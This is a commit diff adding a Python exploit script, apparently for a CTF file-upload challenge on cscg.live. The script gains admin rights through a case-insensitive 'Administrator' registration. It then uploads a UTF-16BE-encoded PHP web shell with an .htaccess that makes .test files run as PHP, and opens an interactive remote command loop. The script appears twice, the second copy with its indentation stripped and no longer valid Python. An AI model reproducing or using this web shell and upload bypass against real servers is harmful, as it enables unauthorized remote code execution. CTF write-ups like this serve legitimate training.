seifallahhomrani1 · June 2, 2022 22:04
diff --git a/file_upload.py b/file_upload.py
 import requests 



 base_url = "https://365781ddbe0e9e54d0821126-file-upload.challenge.master.cscg.live:31337"

 register_url = f"{base_url}/register.php"
 login_url = f"{base_url}/login.php"
 upload_url = f"{base_url}/upload.php"
 dir_url = f"{base_url}/uploads/"


 username = "Administrator" # Don't Change this ! 
 password = "test123"

 #First bug :
 #Getting Admin access by signing up as Administrator (case insenstive!)
 def register_administrator(username,password):
 	payload = {'username': username, 'password':password}
 	r = requests.post(register_url,data=payload)
 	return "Register as administrator successful!" if r.status_code==200 else exit("Error")


 def login(username,password):
 	s = requests.Session()
 	payload = {'username': username, 'password':password}
 	r = s.post(login_url,data=payload)
 	return s if r.status_code==200 else exit("Error")

 #Generating our web shell
 def generate_php_file(filename, script):
 	phpfile = open(filename, 'wb')
 	phpfile.write(script.encode('utf-16be'))
 	phpfile.close()


 #Generating the htaccess file
 def generate_htacess():
 	htaccess = open('.htaccess', 'wb')
 	htaccess.write(b'AddType application/x-httpd-php .test\n')
 	htaccess.write(b'php_value zend.multibyte 1\n')
 	htaccess.write(b'php_value zend.detect_unicode 1\n')
 	htaccess.write(b'php_value display_errors 1\n')
 	htaccess.close()


 #Getting our juicy RCE ! 
 def rce():
 	stop = False 
 	while not stop : 
 		cmd = str(input('Command = ').strip())
 		r = s.get(dir_url+'webshell.test?cmd='+cmd)
 		print(r.text)
 		if str(input('Enough ? (y/n)')).strip() == 'y' :
 			stop = True



 generate_htacess()
 generate_php_file("webshell.test", "<?php system($_GET['cmd']); die(); ?>")


 print(register_administrator(username,password))
 s = login(username,password)


 webshell = open('webshell.test','rb')
 r = s.post(upload_url,files={'fileToUpload':webshell})

 if r.status_code == 200 : 
 	print("Uplaod Success !")
 else:
 	exit("Upload Failure!")

 rce()
	import requests



	base_url = "https://365781ddbe0e9e54d0821126-file-upload.challenge.master.cscg.live:31337"

	register_url = f"{base_url}/register.php"
	login_url = f"{base_url}/login.php"
	upload_url = f"{base_url}/upload.php"
	dir_url = f"{base_url}/uploads/"


	username = "Administrator" # Don't Change this !
	password = "test123"

	#First bug :
	#Getting Admin access by signing up as Administrator (case insenstive!)
	def register_administrator(username,password):
	payload = {'username': username, 'password':password}
	r = requests.post(register_url,data=payload)
	return "Register as administrator successful!" if r.status_code==200 else exit("Error")


	def login(username,password):
	s = requests.Session()
	payload = {'username': username, 'password':password}
	r = s.post(login_url,data=payload)
	return s if r.status_code==200 else exit("Error")

	#Generating our web shell
	def generate_php_file(filename, script):
	phpfile = open(filename, 'wb')
	phpfile.write(script.encode('utf-16be'))
	phpfile.close()


	#Generating the htaccess file
	def generate_htacess():
	htaccess = open('.htaccess', 'wb')
	htaccess.write(b'AddType application/x-httpd-php .test\n')
	htaccess.write(b'php_value zend.multibyte 1\n')
	htaccess.write(b'php_value zend.detect_unicode 1\n')
	htaccess.write(b'php_value display_errors 1\n')
	htaccess.close()


	#Getting our juicy RCE !
	def rce():
	stop = False
	while not stop :
	cmd = str(input('Command = ').strip())
	r = s.get(dir_url+'webshell.test?cmd='+cmd)
	print(r.text)
	if str(input('Enough ? (y/n)')).strip() == 'y' :
	stop = True



	generate_htacess()
	generate_php_file("webshell.test", "<?php system($_GET['cmd']); die(); ?>")


	print(register_administrator(username,password))
	s = login(username,password)


	webshell = open('webshell.test','rb')
	r = s.post(upload_url,files={'fileToUpload':webshell})

	if r.status_code == 200 :
	print("Uplaod Success !")
	else:
	exit("Upload Failure!")

	rce()